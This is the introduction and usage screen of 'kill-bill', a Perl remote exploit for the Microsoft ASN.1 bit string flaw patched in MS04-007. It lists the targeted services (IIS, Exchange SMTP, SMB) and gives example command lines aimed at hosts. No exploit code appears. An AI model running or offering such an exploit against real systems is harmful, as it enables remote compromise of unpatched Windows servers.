I. Introduction This code exploits a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. II. Screenshots $ ./kill-bill.pl . kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007) by Solar Eclipse <solareclipse@phreedom.org> Usage: kill-bill -p <port> -s <service> host Services: iis IIS HTTP server (port 80) iis-ssl IIS HTTP server with SSL (port 443) exchange Microsoft Exchange SMTP server (port 25) smb-nbt SMB over NetBIOS (port 139) smb SMB (port 445) If a service is running on its default port you don t have to specify both the service and the port. Examples: kill-bill -s iis 192.168.0.1 kill-bill -p 80 192.168.0.1 kill-bill -p 1234 -s smb 192.168.0.1
